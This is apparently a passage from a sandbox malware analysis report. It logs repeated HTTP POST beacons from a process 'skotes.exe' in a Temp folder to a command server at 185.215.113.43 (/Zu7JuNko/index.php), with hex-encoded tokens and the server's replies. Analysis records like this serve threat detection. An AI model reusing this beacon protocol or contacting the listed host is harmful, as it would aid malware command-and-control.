                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:40.958774090 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                81192.168.2.450517185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:42.705216885 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:44.082665920 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:43 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                82192.168.2.450519185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:45.723961115 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:47.087977886 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:46 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                83192.168.2.450522185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:48.841048956 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:50.197137117 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:49 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                84192.168.2.450523185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:51.930864096 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:53.282964945 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:53 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                85192.168.2.450525185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:55.066199064 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:56.432173967 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:56 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                86192.168.2.450526185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:58.078564882 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:55:59.437911034 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:59 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                87192.168.2.450528185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:01.175860882 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:02.540721893 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:02 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                88192.168.2.450529185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:04.174627066 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:05.572319984 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:05 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                89192.168.2.450530185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:07.319243908 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:08.716598988 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:08 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                90192.168.2.450532185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:10.357203960 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:11.709975958 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:11 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                91192.168.2.450533185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:13.465338945 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:14.835624933 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:14 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                92192.168.2.450534185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:16.474993944 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:17.903208971 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:17 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                93192.168.2.450535185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:19.654269934 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:21.018471003 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                94192.168.2.450536185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:22.653752089 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:24.029439926 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                95192.168.2.450537185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:25.773665905 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 4
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:27.153628111 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:56:26 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 1 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                96192.168.2.450538185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:56:28.791934013 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 154
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
